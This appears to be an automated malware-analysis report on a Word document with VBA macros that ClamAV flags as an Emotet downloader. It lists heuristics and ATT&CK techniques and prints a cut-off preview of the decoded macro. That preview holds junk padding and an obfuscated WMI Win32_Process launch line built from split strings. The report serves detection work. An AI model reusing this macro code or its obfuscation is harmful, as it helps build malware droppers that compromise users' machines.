MALICIOUS
302
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample contains VBA macros with an AutoOpen function, a common characteristic of Emotet. The macros utilize GetObject and CreateObject to launch the 'Win32_Process' WMI class, specifically calling the 'Create' method with obfuscated strings like 'winmgmts'. This indicates the macro's intent is to execute arbitrary commands, likely to download and run a second-stage payload. ClamAV detection further confirms its malicious nature as Emotet.
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-6861363-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6861363-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 52166 bytes |
SHA-256: 5a24141b46165d9c20ef41e1fb8aab36567c7e10b63ed9e0e077d0dc0154dcd5 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "J7836927"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "K3__0_9"
Function Q_26135()
If R969070 <> u_47668_ Then
R__56_0 = (96250033)
L7_05__7 = k0822_9 * 725736348 + u7201985 + CLng(w61606_)
i9167_ = 624852533 / Hex(L95_9___ / Chr(j0477_ - CDate(653221215)) * 336135081 / 658372251) / j_29_4_ - Fix(27655918)
W4_265__ = (240425586)
End If
If c255___0 <> H_88__51 Then
R_4___ = (327343583)
P6180275 = N_7_808 * 910472076 + j727_6__ + CLng(w9__382)
U5959_5_ = 962449622 / Hex(Q__63_ / Chr(i559_87 - CDate(620323208)) * 38548236 / 646412293) / c31362 - Fix(116467636)
i8_3322 = (904678120)
End If
If b_97_05_ <> J35_2_ Then
T9772886 = (316265073)
j3773342 = j5___5_ * 994209387 + W9_2641 + CLng(w86__6)
k29__75_ = 287310971 / Hex(P4_74_7 / Chr(Q1_25_3 - CDate(993005636)) * 252373984 / 435830395) / t91_798 - Fix(165037700)
G_79_22 = (130517475)
End If
If i50_004 <> n8944__ Then
X50678 = (748350334)
z36_5658 = h_776_ * 615638415 + D48_53_ + CLng(M_21304_)
J4_06715 = 5217535 / Hex(b__27_ / Chr(C_76659 - CDate(170564195)) * 619152673 / 714815817) / Z__963 - Fix(535392577)
M__300_ = (377572701)
End If
If N70893 <> i__27_ Then
K__242 = (640269831)
r1__0_9_ = b4_69_9 * 910427916 + O01965 + CLng(r13_89)
K6__46 = 939911172 / Hex(C57539 / Chr(q93_275_ - CDate(484731141)) * 890546730 / 504562761) / l596_3__ - Fix(48870460)
l8518_06 = (947468235)
End If
If z361__ <> c_7033 Then
f_42477 = (250449282)
j759_52 = w423070_ * 657364126 + J2_9527_ + CLng(o23750_)
H9_7_67_ = 593250741 / Hex(j__2498 / Chr(o_4733 - CDate(104412685)) * 945878929 / 700906862) / t__43392 - Fix(178591256)
t44_142 = (250945710)
End If
If o5865_76 <> V1__7893 Then
K34__73 = (536646801)
K010_9 = q939_82 * 537753872 + Q_962_09 + CLng(Y_0__49)
E__416 = 602892561 / Hex(M__5344 / Chr(p94_689 - CDate(80608639)) * 960235727 / 942103588) / m_67417_ - Fix(603676045)
W255_20 = (422658149)
End If
If i3_42_8_ <> E450050_ Then
K1_75387 = (110066282)
m_20811 = I5_333 * 949491260 + i5_58_9 + CLng(z_71_21)
K_350_6 = 576362040 / Hex(o4247_ / Chr(k7661581 - CDate(45897621)) * 801749007 / 106406446) / H___2560 - Fix(126592608)
u763_0_1 = (323247442)
End If
End Function
Function w_7_0_(b13_0_, d35585)
On Error Resume Next
If r9__7_ <> j57__60 Then
w170247 = (773259819)
P9_4_2_ = j25_0_8 * 131139260 + j8_71_8 + CLng(m67__58)
C9___394 = 659598301 / Hex(m9285_16 / Chr(U5840332 - CDate(521173345)) * 560841025 / 154016721) / E69_8___ - Fix(229265740)
s34_9_42 = (748472625)
End If
If C___641 <> K94929_ Then
M8726_ = (657455705)
c51565 = k876495 * 679640149 + R__7_7 + CLng(T2_6120)
E6_4_58 = 917661997 / Hex(s1_375 / Chr(o6269_ - CDate(755942178)) * 945076564 / 152109427) / c50423 - Fix(260212573)
V9587689 = (429316110)
End If
If i7495_1 <> X686091 Then
K__715 = (472557396)
n80270 = z_006_5 * 8655305 + i__9_66 + CLng(j36_23_)
w6__850 = 115188368 / Hex(p4777__ / Chr(J_50_34 - CDate(181493695)) * 526241481 / 939493216) / i7_146_ - Fix(245892221)
j8__42__ = (999467095)
End If
Set H__700 = GetObject("winmgm" + "ts:Win" + "32_Proce" + "ssStartup")
If f7_0__ <> L09434_6 Then
f3_497 = (686367428)
Q80207_3 = O8945_9 * 173027545 + k_1054 + CLng(U_5_43_)
i__521_ = 481052455 / Hex(w98_57 / Chr(Z71_73 - CDate(513319882)) * 749812153 / 996568670) / M68231 - Fix(278304838)
j_33_350 = (891259447)
End If
If w9_54_ <> R600__4 Then
z_592_ = (391768918)
q056_14_ = U9_585__ * 312064397 + w489__2 + CLng(r7_7__6_)
V__7283 = 503912779 / Hex(J_243_ / Chr(l21272__ - CDate(711696454)) * 324955936 / 407607541) / z70__1_6 - Fix(85418817)
S402694 = (999396750)
End If
If c6__20_ <> V6_532__ Then
s3___6 = (758466284)
Q54490_ = S_3
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.